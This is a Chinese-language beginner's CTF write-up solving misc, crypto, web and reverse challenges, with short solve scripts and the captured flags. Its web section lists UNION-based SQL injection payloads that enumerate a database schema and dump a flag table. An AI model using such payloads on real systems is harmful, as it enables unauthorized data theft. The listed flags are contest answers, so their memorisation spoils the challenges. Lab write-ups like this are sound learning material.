是公开赛道的菜狗,web有两道题没做出来,pwn和reverse不会,主打一个写都写了记录下吧。
Signin
操作内容:做选择题得出flag。
flag值:
flag{I_Agr3e_to_FoL10w_th3_ru1es_c41fa97d}
MISC 兑换码
操作内容:
题目提示flag在图片下方,010修改图片宽度,得到flag。
flag值:
flag{La_vaguelette}
MISC Labyrinth
操作内容:
题目标有LSB,用工具找到flag。
flag值:
flag{e33bb7a1-ac94-4d15-8ff7-fd8c88547b43}
MISC WhereIsFlag
操作内容:
kali连接上去,ls挨个目录找的。
你们二次元真的……
flag值:
flag{0083b779-1f5b-4c01-be80-8123c9b05b64}
MISC pleasingMusic
操作内容:
听了下音频,有嘟嘟滴滴的声音,感觉是摩斯电码,题目又说正反都好听,所以把音频反向,获取摩斯电码为:./--../..--.-/--/---/.-./..././..--.-/-.-./---/-../.
flag值:
flag{ez_morse_code}
MISC decompress
操作内容:
逐层解压,最后有个文件和一个要解密的压缩包,文件打开是:^([a-z]){3}\d[a-z]$,感觉像是解压密码的正则,盲跑一下解压软件试试。密码是:xtr4m,打开之后好几个flag.zip文件,拿说的正确的flag试试:
flag值:
flag{U_R_th3_ma5ter_0f_dec0mpress}
Crypto Base
操作内容:
3d3d3d感觉是hex编码的=,所以hex解码。然后base32+base64。
flag值:
flag{B@sE_0f_CrYpt0_N0W}
Crypto Xor
操作内容:
异或。
from pwn import xor from Crypto.Util.number import bytes_to_long,long_to_bytes key = b'New_Star_CTF' flag='flag{*******************}' # flag[:13]:0-12位 m1 = bytes_to_long(bytes(flag[:13], encoding='utf-8')) m2 = flag[13:] k1=bytes_to_long(key) c1= 8091799978721254458294926060841 m1=k1^c1 m1=long_to_bytes(m1) print(m1) #'flag{0ops!_yo' c2= b';:\x1c1<\x03>*\x10\x11u;' m2=xor(c2,key) print(m2) # b'u_know_XOR!}' # flag{0ops!_you_know_XOR!} |
flag值:
flag{0ops!_you_know_XOR!}
Crypto Strange King
操作内容:
看题目感觉是凯撒,但是单纯解密接不出来。
ksjr-->flag,感觉每个间隔分别是5 7 9 11,再结合题目中的每天进步一点,感觉非常合理,所以写代码跑一下。
cypto='ksjr{EcxvpdErSvcDgdgEzxqjql}' a=5 le="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" i=0 mes=[] for i in cypto: if(i in le): raw_midd=(ord(i)) midd=chr(ord(i)-a) if raw_midd<97: if ord(midd)<65: midd=chr(ord(midd)+26) else: if ord(midd)<97 : midd=chr(ord(midd)+26) mes.append(midd) else : midd=i mes.append(midd) a=(a+2)%26 print("".join(str(l) for l in mes)) |
解出来flag是:flag{PleaseDoNotStopLearing}。
flag值:
flag{PleaseDoNotStopLearing}
Crypto 一眼秒了
操作内容:
是rsa,从网站获取到n的分解,得到p,q。
from Crypto.Util.number import * from gmpy2 import * p = 7221289171488727827673517139597844534869368289455419695964957239047692699919030405800116133805855968123601433247022090070114331842771417566928809956044421 q = 7221289171488727827673517139597844534869368289455419695964957239047692699919030405800116133805855968123601433247022090070114331842771417566928809956045093 n=52147017298260357180329101776864095134806848020663558064141648200366079331962132411967917697877875277103045755972006084078559453777291403087575061382674872573336431876500128247133861957730154418461680506403680189755399752882558438393107151815794295272358955300914752523377417192504702798450787430403387076153 c=48757373363225981717076130816529380470563968650367175499612268073517990636849798038662283440350470812898424299904371831068541394247432423751879457624606194334196130444478878533092854342610288522236409554286954091860638388043037601371807379269588474814290382239910358697485110591812060488786552463208464541069 e = 65537 d = gmpy2.invert(e,(p-1)*(q-1)) m = pow(c,d,n) m =long_to_bytes(m).decode('utf-8',errors='ignore') print(m) |
flag值:
flag{9cd4b35a-affc-422a-9862-58e1cc3ff8d2}
Web headach3
操作内容:
打开网页看响应体,在响应头里。
flag值:
flag{You_Ar3_R3Ally_A_9ooD_d0ctor}
Web 会赢吗
操作内容:
-
/3ntranc3查看页面源代码,获得flag第一部分:ZmxhZ3tXQTB3和/4cqu1siti0n;
- 猜想/4cqu1siti0n是另一个页面,打开。
查看页面源代码,尝试构造到/api/flag/4cqu1siti0n的post请求(这里是我猜的)。获得:
"flag":"IV95NF9yM2Fs","nextLevel":"s34l"
- /s34l:查看源代码,修改图示部分:
获得第三部分flag:MXlfR3I0c1B和下一阶段:/Ap3x
- 查看源代码感觉1部分是关键,要点击2 部分使其生效。<noscript>关闭浏览器的js选项:
获得flag:fSkpKcyF9,下一阶段是空。
(5)组合得到:ZmxhZ3tXQTB3IV95NF9yM2FsMXlfR3I0c1BfSkpKcyF9,base64解密得到flag。flag值:
flag{WA0w!_y4_r3al1y_Gr4sP_JJJs!}
Web 谢谢皮蛋
操作内容:
看了下是sql注入:
5 union select 1,2#
5 union select database(),2#
5 union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctf'#
5 union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctf' and table_name='Fl4g'#
5 union select 1,group_concat(id) from ctf.Fl4g#
5 union select 1,group_concat(des) from ctf.Fl4g#
5 union select 1,group_concat(value) from ctf.Fl4g#
flag值:
flag{fe3abae7-9010-4fd5-81d5-fc7db01684f0}
Reverse begin
操作内容:
按照步骤操作即可:
flag值:
flag{Mak3_aN_3Ff0rt_tO_5eArcH_F0r_th3_f14g_C0Rpse}